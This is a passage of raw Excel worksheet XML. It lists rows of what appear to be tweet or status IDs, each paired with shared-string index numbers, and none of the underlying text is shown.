        <v>1</v>
      </c>
      <c r="D2862" t="s">
        <v>7212</v>
      </c>
      <c r="E2862" t="s">
        <v>1783</v>
      </c>
    </row>
    <row r="2863" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2863">
        <v>1.23498965266417E+18</v>
      </c>
      <c r="B2863" t="s">
        <v>7213</v>
      </c>
      <c r="C2863" t="s">
        <v>1</v>
      </c>
      <c r="D2863" t="s">
        <v>7214</v>
      </c>
      <c r="E2863" t="s">
        <v>7215</v>
      </c>
    </row>
    <row r="2864" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2864">
        <v>1.2349893505442099E+18</v>
      </c>
      <c r="B2864" t="s">
        <v>7216</v>
      </c>
      <c r="C2864" t="s">
        <v>1</v>
      </c>
      <c r="D2864" t="s">
        <v>7217</v>
      </c>
      <c r="E2864" t="s">
        <v>7218</v>
      </c>
    </row>
    <row r="2865" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2865">
        <v>1.23498934887073E+18</v>
      </c>
      <c r="B2865" t="s">
        <v>7216</v>
      </c>
      <c r="C2865" t="s">
        <v>1</v>
      </c>
      <c r="D2865" t="s">
        <v>7219</v>
      </c>
      <c r="E2865" t="s">
        <v>7220</v>
      </c>
    </row>
    <row r="2866" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2866">
        <v>1.2349892403641001E+18</v>
      </c>
      <c r="B2866" t="s">
        <v>7221</v>
      </c>
      <c r="C2866" t="s">
        <v>1</v>
      </c>
      <c r="D2866" t="s">
        <v>7222</v>
      </c>
      <c r="E2866" t="s">
        <v>7223</v>
      </c>
    </row>
    <row r="2867" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2867">
        <v>1.23498923791457E+18</v>
      </c>
      <c r="B2867" t="s">
        <v>7224</v>
      </c>
      <c r="C2867" t="s">
        <v>1</v>
      </c>
      <c r="D2867" t="s">
        <v>7225</v>
      </c>
      <c r="E2867" t="s">
        <v>7226</v>
      </c>
    </row>
    <row r="2868" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2868">
        <v>1.2349891039946299E+18</v>
      </c>
      <c r="B2868" t="s">
        <v>7227</v>
      </c>
      <c r="C2868" t="s">
        <v>1</v>
      </c>
      <c r="D2868" t="s">
        <v>7228</v>
      </c>
      <c r="E2868" t="s">
        <v>7117</v>
      </c>
    </row>
    <row r="2869" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2869">
        <v>1.2349890252256599E+18</v>
      </c>
      <c r="B2869" t="s">
        <v>7229</v>
      </c>
      <c r="C2869" t="s">
        <v>1</v>
      </c>
      <c r="D2869" t="s">
        <v>7230</v>
      </c>
      <c r="E2869" t="s">
        <v>5256</v>
      </c>
    </row>
    <row r="2870" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2870">
        <v>1.2349889939319601E+18</v>
      </c>
      <c r="B2870" t="s">
        <v>7231</v>
      </c>
      <c r="C2870" t="s">
        <v>1</v>
      </c>
      <c r="D2870" t="s">
        <v>7232</v>
      </c>
      <c r="E2870" t="s">
        <v>4400</v>
      </c>
    </row>
    <row r="2871" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2871">
        <v>1.2349889678643599E+18</v>
      </c>
      <c r="B2871" t="s">
        <v>7233</v>
      </c>
      <c r="C2871" t="s">
        <v>1</v>
      </c>
      <c r="D2871" t="s">
        <v>7234</v>
      </c>
      <c r="E2871" t="s">
        <v>7235</v>
      </c>
    </row>
    <row r="2872" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2872">
        <v>1.2349889569801101E+18</v>
      </c>
      <c r="B2872" t="s">
        <v>7236</v>
      </c>
      <c r="C2872" t="s">
        <v>1</v>
      </c>
      <c r="D2872" t="s">
        <v>7237</v>
      </c>
      <c r="E2872" t="s">
        <v>7238</v>
      </c>
    </row>
    <row r="2873" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2873">
        <v>1.2349888851946299E+18</v>
      </c>
      <c r="B2873" t="s">
        <v>7239</v>
      </c>
      <c r="C2873" t="s">
        <v>1</v>
      </c>
      <c r="D2873" t="s">
        <v>7240</v>
      </c>
      <c r="E2873" t="s">
        <v>7241</v>
      </c>
    </row>
    <row r="2874" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2874">
        <v>1.23498854977614E+18</v>
      </c>
      <c r="B2874" t="s">
        <v>7242</v>
      </c>
      <c r="C2874" t="s">
        <v>1</v>
      </c>
      <c r="D2874" t="s">
        <v>7243</v>
      </c>
      <c r="E2874" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="2875" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2875">
        <v>1.2349882240632699E+18</v>
      </c>
      <c r="B2875" t="s">
        <v>7244</v>
      </c>
      <c r="C2875" t="s">
        <v>1</v>
      </c>
      <c r="D2875" t="s">
        <v>7245</v>
      </c>
      <c r="E2875" t="s">
        <v>1804</v>
      </c>
    </row>
    <row r="2876" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2876">
        <v>1.23498820889665E+18</v>
      </c>
      <c r="B2876" t="s">
        <v>7246</v>
      </c>
      <c r="C2876" t="s">
        <v>1</v>
      </c>
      <c r="D2876" t="s">
        <v>7247</v>
      </c>
      <c r="E2876" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="2877" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2877">
        <v>1.2349880868004301E+18</v>
      </c>
      <c r="B2877" t="s">
        <v>7248</v>
      </c>
      <c r="C2877" t="s">
        <v>1</v>
      </c>
      <c r="D2877" t="s">
        <v>7249</v>
      </c>
      <c r="E2877" t="s">
        <v>7250</v>
      </c>
    </row>
    <row r="2878" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2878">
        <v>1.2349879909690099E+18</v>
      </c>
      <c r="B2878" t="s">
        <v>7251</v>
      </c>
      <c r="C2878" t="s">
        <v>1</v>
      </c>
      <c r="D2878" t="s">
        <v>7252</v>
      </c>
      <c r="E2878" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="2879" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2879">
        <v>1.2349879746951099E+18</v>
      </c>
      <c r="B2879" t="s">
        <v>7253</v>
      </c>
      <c r="C2879" t="s">
        <v>1</v>
      </c>
      <c r="D2879" t="s">
        <v>7254</v>
      </c>
      <c r="E2879" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="2880" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2880">
        <v>1.2349879730928799E+18</v>
      </c>
      <c r="B2880" t="s">
        <v>7253</v>
      </c>
      <c r="C2880" t="s">
        <v>1</v>
      </c>
      <c r="D2880" t="s">
        <v>7255</v>
      </c>
      <c r="E2880" t="s">
        <v>7256</v>
      </c>
    </row>
    <row r="2881" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2881">
        <v>1.23498795551453E+18</v>
      </c>
      <c r="B2881" t="s">
        <v>7257</v>
      </c>
      <c r="C2881" t="s">
        <v>1</v>
      </c>
      <c r="D2881" t="s">
        <v>7258</v>
      </c>
      <c r="E2881" t="s">
        <v>7259</v>
      </c>
    </row>
    <row r="2882" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2882">
        <v>1.23498795296865E+18</v>
      </c>
      <c r="B2882" t="s">
        <v>7260</v>
      </c>
      <c r="C2882" t="s">
        <v>1</v>
      </c>
      <c r="D2882" t="s">
        <v>7261</v>
      </c>
      <c r="E2882" t="s">
        <v>5881</v>
      </c>
    </row>
    <row r="2883" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2883">
        <v>1.2349879498816399E+18</v>
      </c>
      <c r="B2883" t="s">
        <v>7262</v>
      </c>
      <c r="C2883" t="s">
        <v>1</v>
      </c>
      <c r="D2883" t="s">
        <v>7263</v>
      </c>
      <c r="E2883" t="s">
        <v>5884</v>
      </c>
    </row>
    <row r="2884" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2884">
        <v>1.2349879439718001E+18</v>
      </c>
      <c r="B2884" t="s">
        <v>7264</v>
      </c>
      <c r="C2884" t="s">
        <v>1</v>
      </c>
      <c r="D2884" t="s">
        <v>7265</v>
      </c>
      <c r="E2884" t="s">
        <v>5890</v>
      </c>
    </row>
    <row r="2885" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2885">
        <v>1.23498792726589E+18</v>
      </c>
      <c r="B2885" t="s">
        <v>7266</v>
      </c>
      <c r="C2885" t="s">
        <v>1</v>
      </c>
      <c r="D2885" t="s">
        <v>7267</v>
      </c>
      <c r="E2885" t="s">
        <v>7268</v>
      </c>
    </row>
    <row r="2886" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2886">
        <v>1.23498791437679E+18</v>
      </c>
      <c r="B2886" t="s">
        <v>7269</v>
      </c>
      <c r="C2886" t="s">
        <v>1</v>
      </c>
      <c r="D2886" t="s">
        <v>7270</v>
      </c>
      <c r="E2886" t="s">
        <v>7268</v>
      </c>
    </row>
    <row r="2887" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2887">
        <v>1.2349878944329001E+18</v>
      </c>
      <c r="B2887" t="s">
        <v>7271</v>
      </c>
      <c r="C2887" t="s">
        <v>1</v>
      </c>
      <c r="D2887" t="s">
        <v>7272</v>
      </c>
      <c r="E2887" t="s">
        <v>7273</v>
      </c>
    </row>
    <row r="2888" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2888">
        <v>1.2349878719891799E+18</v>
      </c>
      <c r="B2888" t="s">
        <v>7274</v>
      </c>
      <c r="C2888" t="s">
        <v>1</v>
      </c>
      <c r="D2888" t="s">
        <v>7275</v>
      </c>
      <c r="E2888" t="s">
        <v>7273</v>
      </c>
    </row>
    <row r="2889" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2889">
        <v>1.23498778314963E+18</v>
      </c>
      <c r="B2889" t="s">
        <v>7276</v>
      </c>
      <c r="C2889" t="s">
        <v>1</v>
      </c>
      <c r="D2889" t="s">
        <v>7277</v>
      </c>
      <c r="E2889" t="s">
        <v>7278</v>
      </c>
    </row>
    <row r="2890" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2890">
        <v>1.2349876737915E+18</v>
      </c>
      <c r="B2890" t="s">
        <v>7279</v>
      </c>
      <c r="C2890" t="s">
        <v>1</v>
      </c>
      <c r="D2890" t="s">
        <v>7280</v>
      </c>
      <c r="E2890" t="s">
        <v>7281</v>
      </c>
    </row>
    <row r="2891" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2891">
        <v>1.23498763247347E+18</v>
      </c>
      <c r="B2891" t="s">
        <v>7282</v>
      </c>
      <c r="C2891" t="s">
        <v>1</v>
      </c>
      <c r="D2891" t="s">
        <v>7283</v>
      </c>
      <c r="E2891" t="s">
        <v>5493</v>
      </c>
    </row>
    <row r="2892" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2892">
        <v>1.2349874954413499E+18</v>
      </c>
      <c r="B2892" t="s">
        <v>7284</v>
      </c>
      <c r="C2892" t="s">
        <v>1</v>
      </c>
      <c r="D2892" t="s">
        <v>7285</v>
      </c>
      <c r="E2892" t="s">
        <v>7286</v>
      </c>
    </row>
    <row r="2893" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2893">
        <v>1.2349873093442299E+18</v>
      </c>
      <c r="B2893" t="s">
        <v>7287</v>
      </c>
      <c r="C2893" t="s">
        <v>1</v>
      </c>
      <c r="D2893" t="s">
        <v>7288</v>
      </c>
      <c r="E2893" t="s">
        <v>7289</v>
      </c>
    </row>
    <row r="2894" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2894">
        <v>1.2349869147945201E+18</v>
      </c>
      <c r="B2894" t="s">
        <v>7290</v>
      </c>
      <c r="C2894" t="s">
        <v>1</v>
      </c>
      <c r="D2894" t="s">
        <v>7291</v>
      </c>
      <c r="E2894" t="s">
        <v>6018</v>
      </c>
    </row>
    <row r="2895" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2895">
        <v>1.23498666753602E+18</v>
      </c>
      <c r="B2895" t="s">
        <v>7292</v>
      </c>
      <c r="C2895" t="s">
        <v>1</v>
      </c>
      <c r="D2895" t="s">
        <v>7293</v>
      </c>
      <c r="E2895" t="s">
        <v>7294</v>
      </c>
    </row>
    <row r="2896" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2896">
        <v>1.2349866251777999E+18</v>
      </c>
      <c r="B2896" t="s">
        <v>7295</v>
      </c>
      <c r="C2896" t="s">
        <v>1</v>
      </c>
      <c r="D2896" t="s">
        <v>7296</v>
      </c>
      <c r="E2896" t="s">
        <v>6028</v>
      </c>
    </row>
    <row r="2897" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2897">
        <v>1.23498650274606E+18</v>
      </c>
      <c r="B2897" t="s">
        <v>7297</v>
      </c>
      <c r="C2897" t="s">
        <v>1</v>
      </c>
      <c r="D2897" t="s">
        <v>7298</v>
      </c>
      <c r="E2897" t="s">
        <v>6037</v>
      </c>
    </row>
    <row r="2898" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2898">
        <v>1.23498606115293E+18</v>
      </c>
      <c r="B2898" t="s">
        <v>7299</v>
      </c>
      <c r="C2898" t="s">
        <v>1</v>
      </c>
      <c r="D2898" t="s">
        <v>7300</v>
      </c>
      <c r="E2898" t="s">
        <v>7301</v>
      </c>
    </row>
    <row r="2899" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2899">
        <v>1.2349857684450401E+18</v>
      </c>
      <c r="B2899" t="s">
        <v>7302</v>
      </c>
      <c r="C2899" t="s">
        <v>1</v>
      </c>
      <c r="D2899" t="s">
        <v>7303</v>
      </c>
      <c r="E2899" t="s">
        <v>7304</v>
      </c>
    </row>
    <row r="2900" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2900">
        <v>1.23498550996686E+18</v>
      </c>
      <c r="B2900" t="s">
        <v>7305</v>
      </c>
      <c r="C2900" t="s">
        <v>1</v>
      </c>
      <c r="D2900" t="s">
        <v>7306</v>
      </c>
      <c r="E2900" t="s">
        <v>7307</v>
      </c>
    </row>
    <row r="2901" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2901">
        <v>1.23498533597872E+18</v>
      </c>
      <c r="B2901" t="s">
        <v>7308</v>
      </c>
      <c r="C2901" t="s">
        <v>1</v>
      </c>
      <c r="D2901" t="s">
        <v>7309</v>
      </c>
      <c r="E2901" t="s">
        <v>5503</v>
      </c>
    </row>
    <row r="2902" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2902">
        <v>1.2349852784664901E+18</v>
      </c>
      <c r="B2902" t="s">
        <v>7310</v>
      </c>
      <c r="C2902" t="s">
        <v>1</v>
      </c>
      <c r="D2902" t="s">
        <v>7311</v>
      </c>
      <c r="E2902" t="s">
        <v>7312</v>
      </c>
    </row>
    <row r="2903" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2903">
        <v>1.23498486386367E+18</v>
      </c>
      <c r="B2903" t="s">
        <v>7313</v>
      </c>
      <c r="C2903" t="s">
        <v>1</v>
      </c>
      <c r="D2903" t="s">
        <v>7314</v>
      </c>
      <c r="E2903" t="s">
        <v>2459</v>
      </c>
    </row>
    <row r="2904" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2904">
        <v>1.2349846493795999E+18</v>
      </c>
      <c r="B2904" t="s">
        <v>7315</v>
      </c>
      <c r="C2904" t="s">
        <v>1</v>
      </c>
      <c r="D2904" t="s">
        <v>7316</v>
      </c>
      <c r="E2904" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="2905" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2905">
        <v>1.2349845155938701E+18</v>
      </c>
      <c r="B2905" t="s">
        <v>7317</v>
      </c>
      <c r="C2905" t="s">
        <v>1</v>
      </c>
      <c r="D2905" t="s">
        <v>7318</v>
      </c>
      <c r="E2905" t="s">
        <v>7319</v>
      </c>
    </row>
    <row r="2906" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2906">
        <v>1.2349844164909E+18</v>
      </c>
      <c r="B2906" t="s">
        <v>7320</v>
      </c>
      <c r="C2906" t="s">
        <v>1</v>
      </c>
      <c r="D2906" t="s">
        <v>7321</v>
      </c>
      <c r="E2906" t="s">
        <v>1986</v>
      </c>
    </row>
    <row r="2907" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2907">
        <v>1.2349831406339999E+18</v>
      </c>
      <c r="B2907" t="s">
        <v>7322</v>
      </c>
      <c r="C2907" t="s">
        <v>1</v>
      </c>
      <c r="D2907" t="s">
        <v>7323</v>
      </c>
      <c r="E2907" t="s">
        <v>4941</v>
      </c>
    </row>
    <row r="2908" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2908">
        <v>1.2349827789506501E+18</v>
      </c>
      <c r="B2908" t="s">
        <v>7324</v>
      </c>
      <c r="C2908" t="s">
        <v>1</v>
      </c>
      <c r="D2908" t="s">
        <v>7325</v>
      </c>
      <c r="E2908" t="s">
        <v>511</v>
      </c>
    </row>
    <row r="2909" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2909">
        <v>1.2349824201743099E+18</v>
      </c>
      <c r="B2909" t="s">
        <v>7326</v>
      </c>
      <c r="C2909" t="s">
        <v>1</v>
      </c>
      <c r="D2909" t="s">
        <v>7327</v>
      </c>
      <c r="E2909" t="s">
        <v>7328</v>
      </c>
    </row>
    <row r="2910" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2910">
        <v>1.23498209688979E+18</v>
      </c>
      <c r="B2910" t="s">
        <v>7329</v>
      </c>
      <c r="C2910" t="s">
        <v>1</v>
      </c>
      <c r="D2910" t="s">
        <v>7330</v>
      </c>
      <c r="E2910" t="s">
        <v>7331</v>
      </c>
    </row>
    <row r="2911" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2911">
        <v>1.2349817605023301E+18</v>
      </c>
      <c r="B2911" t="s">
        <v>7332</v>
      </c>
      <c r="C2911" t="s">
        <v>1</v>
      </c>
      <c r="D2911" t="s">
        <v>7333</v>
      </c>
      <c r="E2911" t="s">
        <v>7334</v>
      </c>
    </row>
    <row r="2912" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2912">
        <v>1.2349806237790799E+18</v>
      </c>
      <c r="B2912" t="s">
        <v>7335</v>
      </c>
      <c r="C2912" t="s">
        <v>1</v>
      </c>
      <c r="D2912" t="s">
        <v>7336</v>
      </c>
      <c r="E2912" t="s">
        <v>3877</v>
      </c>
    </row>
    <row r="2913" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2913">
        <v>1.23498031679775E+18</v>
      </c>
      <c r="B2913" t="s">
        <v>7337</v>
      </c>
      <c r="C2913" t="s">
        <v>1</v>
      </c>
      <c r="D2913" t="s">
        <v>7338</v>
      </c>
      <c r="E2913" t="s">
        <v>7339</v>
      </c>
    </row>
    <row r="2914" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2914">
        <v>1.2349800938076401E+18</v>
      </c>
      <c r="B2914" t="s">
        <v>7340</v>
      </c>
      <c r="C2914" t="s">
        <v>1</v>
      </c>
      <c r="D2914" t="s">
        <v>7341</v>
      </c>
      <c r="E2914" t="s">
        <v>7342</v>
      </c>
    </row>
    <row r="2915" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2915">
        <v>1.2349794259318001E+18</v>
      </c>
      <c r="B2915" t="s">
        <v>7343</v>
      </c>
      <c r="C2915" t="s">
        <v>1</v>
      </c>
      <c r="D2915" t="s">
        <v>7344</v>
      </c>
      <c r="E2915" t="s">
        <v>7345</v>
      </c>
    </row>
    <row r="2916" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2916">
        <v>1.2349793997090099E+18</v>
      </c>
      <c r="B2916" t="s">
        <v>7346</v>
      </c>
      <c r="C2916" t="s">
        <v>1</v>
      </c>
      <c r="D2916" t="s">
        <v>7347</v>
      </c>
      <c r="E2916" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="2917" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2917">
        <v>1.2349793752645901E+18</v>
      </c>
      <c r="B2917" t="s">
        <v>7348</v>
      </c>
      <c r="C2917" t="s">
        <v>1</v>
      </c>
      <c r="D2917" t="s">
        <v>7349</v>
      </c>
      <c r="E2917" t="s">
        <v>7350</v>
      </c>
    </row>
    <row r="2918" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2918">
        <v>1.23497888908606E+18</v>
      </c>
      <c r="B2918" t="s">
        <v>7351</v>
      </c>
      <c r="C2918" t="s">
        <v>1</v>
      </c>
      <c r="D2918" t="s">
        <v>7352</v>
      </c>
      <c r="E2918" t="s">
        <v>7339</v>
      </c>
    </row>
    <row r="2919" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2919">
        <v>1.2349787385776499E+18</v>
      </c>
      <c r="B2919" t="s">
        <v>7353</v>
      </c>
      <c r="C2919" t="s">
        <v>1</v>
      </c>
      <c r="D2919" t="s">
        <v>7354</v>
      </c>
      <c r="E2919" t="s">
        <v>7355</v>
      </c>
    </row>
    <row r="2920" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2920">
        <v>1.23497760794849E+18</v>
      </c>
      <c r="B2920" t="s">
        <v>7356</v>
      </c>
      <c r="C2920" t="s">
        <v>1</v>
      </c>
      <c r="D2920" t="s">
        <v>7357</v>
      </c>
      <c r="E2920" t="s">
        <v>7358</v>
      </c>
    </row>
    <row r="2921" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2921">
        <v>1.23497754049985E+18</v>
      </c>
      <c r="B2921" t="s">
        <v>7359</v>
      </c>
      <c r="C2921" t="s">
        <v>1</v>
      </c>
      <c r="D2921" t="s">
        <v>7360</v>
      </c>
      <c r="E2921" t="s">
        <v>5029</v>
      </c>
    </row>
    <row r="2922" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2922">
        <v>1.23497753715699E+18</v>
      </c>
      <c r="B2922" t="s">
        <v>7361</v>
      </c>
      <c r="C2922" t="s">
        <v>1</v>
      </c>
      <c r="D2922" t="s">
        <v>7362</v>
      </c>
      <c r="E2922" t="s">
        <v>5032</v>
      </c>
    </row>
    <row r="2923" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2923">
        <v>1.23497701109906E+18</v>
      </c>
      <c r="B2923" t="s">
        <v>7363</v>
      </c>
      <c r="C2923" t="s">
        <v>1</v>
      </c>
      <c r="D2923" t="s">
        <v>7364</v>
      </c>
      <c r="E2923" t="s">
        <v>7365</v>
      </c>
    </row>
    <row r="2924" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2924">
        <v>1.2349769839157701E+18</v>
      </c>
      <c r="B2924" t="s">
        <v>7366</v>
      </c>
      <c r="C2924" t="s">
        <v>1</v>
      </c>
      <c r="D2924" t="s">
        <v>7367</v>
      </c>
      <c r="E2924" t="s">
        <v>7368</v>
      </c>
    </row>
    <row r="2925" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2925">
        <v>1.2349769168907699E+18</v>
      </c>
      <c r="B2925" t="s">
        <v>7369</v>
      </c>
      <c r="C2925" t="s">
        <v>1</v>
      </c>
      <c r="D2925" t="s">
        <v>7370</v>
      </c>
      <c r="E2925" t="s">
        <v>7371</v>
      </c>
    </row>
    <row r="2926" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2926">
        <v>1.23497684942961E+18</v>
      </c>
      <c r="B2926" t="s">
        <v>7372</v>
      </c>
      <c r="C2926" t="s">
        <v>1</v>
      </c>
      <c r="D2926" t="s">
        <v>7373</v>
      </c>
      <c r="E2926" t="s">
        <v>1236</v>
      </c>
    </row>
    <row r="2927" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2927">
        <v>1.2349768488759401E+18</v>
      </c>
      <c r="B2927" t="s">
        <v>7372</v>
      </c>
      <c r="C2927" t="s">
        <v>1</v>
      </c>
      <c r="D2927" t="s">
        <v>7374</v>
      </c>
      <c r="E2927" t="s">
        <v>980</v>
      </c>
    </row>
    <row r="2928" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2928">
        <v>1.2349761213319601E+18</v>
      </c>
      <c r="B2928" t="s">
        <v>7375</v>
      </c>
      <c r="C2928" t="s">
        <v>1</v>
      </c>
      <c r="D2928" t="s">
        <v>7376</v>
      </c>
      <c r="E2928" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="2929" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2929">
        <v>1.23497584238574E+18</v>
      </c>
      <c r="B2929" t="s">
        <v>7377</v>
      </c>
      <c r="C2929" t="s">
        <v>1</v>
      </c>
      <c r="D2929" t="s">
        <v>7378</v>
      </c>
      <c r="E2929" t="s">
        <v>7379</v>
      </c>
    </row>
    <row r="2930" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2930">
        <v>1.23497518317102E+18</v>
      </c>
      <c r="B2930" t="s">
        <v>7380</v>
      </c>
      <c r="C2930" t="s">
        <v>1</v>
      </c>
      <c r="D2930" t="s">
        <v>7381</v>
      </c>
      <c r="E2930" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="2931" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2931">
        <v>1.2349749207795E+18</v>
      </c>
      <c r="B2931" t="s">
        <v>7382</v>
      </c>
      <c r="C2931" t="s">
        <v>1</v>
      </c>
      <c r="D2931" t="s">
        <v>7383</v>
      </c>
      <c r="E2931" t="s">
        <v>7384</v>
      </c>
    </row>
    <row r="2932" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2932">
        <v>1.23497455590446E+18</v>
      </c>
      <c r="B2932" t="s">
        <v>7385</v>
      </c>
      <c r="C2932" t="s">
        <v>1</v>
      </c>
      <c r="D2932" t="s">
        <v>7386</v>
      </c>
      <c r="E2932" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="2933" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2933">
        <v>1.23497446941373E+18</v>
      </c>
      <c r="B2933" t="s">
        <v>7387</v>
      </c>
      <c r="C2933" t="s">
        <v>1</v>
      </c>
      <c r="D2933" t="s">
        <v>7388</v>
      </c>
      <c r="E2933" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="2934" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2934">
        <v>1.2349743228396001E+18</v>
      </c>
      <c r="B2934" t="s">
        <v>7389</v>
      </c>
      <c r="C2934" t="s">
        <v>1</v>
      </c>
      <c r="D2934" t="s">
        <v>7390</v>
      </c>
      <c r="E2934" t="s">
        <v>7391</v>
      </c>
    </row>
    <row r="2935" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2935">
        <v>1.2349742199826199E+18</v>
      </c>
      <c r="B2935" t="s">
        <v>7392</v>
      </c>
      <c r="C2935" t="s">
        <v>1</v>
      </c>
      <c r="D2935" t="s">
        <v>7393</v>
      </c>
      <c r="E2935" t="s">
        <v>6584</v>
      </c>
    </row>
    <row r="2936" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2936">
        <v>1.23497401321186E+18</v>
      </c>
      <c r="B2936" t="s">
        <v>7394</v>
      </c>
      <c r="C2936" t="s">
        <v>1</v>
      </c>
      <c r="D2936" t="s">
        <v>7395</v>
      </c>
      <c r="E2936" t="s">
        <v>7396</v>
      </c>
    </row>
    <row r="2937" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2937">
        <v>1.2349710697835599E+18</v>
      </c>
      <c r="B2937" t="s">
        <v>7397</v>
      </c>
      <c r="C2937" t="s">
        <v>1</v>
      </c>
      <c r="D2937" t="s">
        <v>7398</v>
      </c>
      <c r="E2937" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="2938" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2938">
        <v>1.2349706229559301E+18</v>
      </c>
      <c r="B2938" t="s">
        <v>7399</v>
      </c>
      <c r="C2938" t="s">
        <v>1</v>
      </c>
      <c r="D2938" t="s">
        <v>7400</v>
      </c>
      <c r="E2938" t="s">
        <v>7401</v>
      </c>
    </row>
    <row r="2939" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2939">
        <v>1.2349705561700401E+18</v>
      </c>
      <c r="B2939" t="s">
        <v>7402</v>
      </c>
      <c r="C2939" t="s">
        <v>1</v>
      </c>
      <c r="D2939" t="s">
        <v>7403</v>
      </c>
      <c r="E2939" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="2940" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2940">
        <v>1.23496864590381E+18</v>
      </c>
      <c r="B2940" t="s">
        <v>7404</v>
      </c>
      <c r="C2940" t="s">
        <v>1</v>
      </c>
      <c r="D2940" t="s">
        <v>7405</v>
      </c>
      <c r="E2940" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="2941" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2941">
        <v>1.2349683021721101E+18</v>
      </c>
      <c r="B2941" t="s">
        <v>7406</v>
      </c>
      <c r="C2941" t="s">
        <v>1</v>
      </c>
      <c r="D2941" t="s">
        <v>7407</v>
      </c>
      <c r="E2941" t="s">
        <v>7408</v>
      </c>
    </row>
    <row r="2942" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2942">
        <v>1.2349675958891E+18</v>
      </c>
      <c r="B2942" t="s">
        <v>7409</v>
      </c>
      <c r="C2942" t="s">
        <v>1</v>
      </c>
      <c r="D2942" t="s">
        <v>7410</v>
      </c>
      <c r="E2942" t="s">
        <v>1595</v>
      </c>
    </row>
    <row r="2943" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A2943">
        <v>1.2349675884149199E+18</v>
      </c>
      <c r="B2943" t="s">
        <v>7411</v>
      </c>
      <c r="C2943" t="s">
        <v>1</v>
      </c>
      <c r="D2943" t="s">
        <v>7412</v>
      </c>
      <c r="E2943" t="s">
